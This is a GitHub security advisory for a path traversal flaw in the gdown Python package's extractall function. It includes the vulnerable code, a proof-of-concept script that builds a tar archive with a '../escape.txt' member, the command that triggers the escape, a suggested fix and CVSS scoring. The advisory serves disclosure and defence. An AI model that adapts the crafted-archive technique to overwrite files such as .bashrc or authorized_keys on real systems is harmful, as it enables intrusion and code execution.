Skip to content

gdown Affected by Arbitrary File Write via Path Traversal in gdown.extractall

Moderate severity GitHub Reviewed Published Apr 12, 2026 in wkentaro/gdown • Updated Apr 24, 2026

Package

pip gdown (pip)

Affected versions

<= 5.2.1

Patched versions

5.2.2

Description

Summary

The gdown library (tested on v5.2.1) is vulnerable to a Path Traversal attack within its extractall functionality. When extracting a maliciously crafted ZIP or TAR archive, the library fails to sanitize or validate the filenames of the archive members. This allow files to be written outside the intended destination directory, potentially leading to arbitrary file overwrite and Remote Code Execution (RCE).

Details

The vulnerability exists in gdown/extractall.py within the extractall() function. The function takes an archive path and a destination directory (to), then calls the underlying extractall() method of Python's tarfile or zipfile modules without validating whether the archive members stay within the to boundary.

Vulnerable Code:

# gdown/extractall.py
def extractall(path, to=None):
    # ... (omitted) ...
    with opener(path, mode) as f:
        f.extractall(path=to)  # Vulnerable: No path validation or filters`

Even on modern Python versions (3.12+), if the filter parameter is not explicitly set or if the library's wrapper logic bypasses modern protections, path traversal remains possible as demonstrated in the PoC.

PoC

Steps to Reproduce

  1. Create the Malicious Archive (poc.py):
import tarfile
import io
import os

# Create a target directory
os.makedirs("./safe_target/subfolder", exist_ok=True)

# Generate a TAR file containing a member with path traversal
with tarfile.open("evil.tar", "w") as tar:
    # Target: escape the subfolder and write to the parent 'safe_target'
    payload = tarfile.TarInfo(name="../escape.txt")
    content = b"Path Traversal Success!"
    payload.size = len(content)
    tar.addfile(payload, io.BytesIO(content))

print("[+] evil.tar created.")`
  1. Execute the Vulnerable Function:
`python3 -c "from gdown import extractall; extractall('evil.tar', to='./safe_target/subfolder')"`
  1. Verify the Escape:
ls -l ./safe_target/escape.txt
# Output: -rw-r--r-- 1 user user 23 Mar 15 2026 ./safe_target/escape.txt`

Impact

An attacker can provide a specially crafted archive that, when extracted via gdown, overwrites critical files on the victim's system.

  • Arbitrary File Overwrite: Overwriting .bashrc, .ssh/authorized_keys, or configuration files.
  • Remote Code Execution (RCE): By overwriting executable scripts or Python modules within a virtual environment.

Recommended Mitigation

mplement path validation to ensure that all extracted files are contained within the target directory.

Suggested Fix:

import os

def is_within_directory(directory, target):
    abs_directory = os.path.abspath(directory)
    abs_target = os.path.abspath(target)
    prefix = os.path.commonpath([abs_directory])
    return os.path.commonpath([abs_directory, abs_target]) == prefix

# Inside [extractall.py](http://extractall.py/)
with opener(path, mode) as f:
    if isinstance(f, tarfile.TarFile):
        for member in f.getmembers():
            member_path = os.path.join(to, [member.name](http://member.name/))
            if not is_within_directory(to, member_path):
                raise Exception("Attempted Path Traversal in Tar File")
    f.extractall(path=to)

References

@wkentaro wkentaro published to wkentaro/gdown Apr 12, 2026
Published to the GitHub Advisory Database Apr 14, 2026
Reviewed Apr 14, 2026
Published by the National Vulnerability Database Apr 18, 2026
Last updated Apr 24, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(28th percentile)

Weaknesses

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Learn more on MITRE.

CVE ID

CVE-2026-40491

GHSA ID

GHSA-76hw-p97h-883f

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.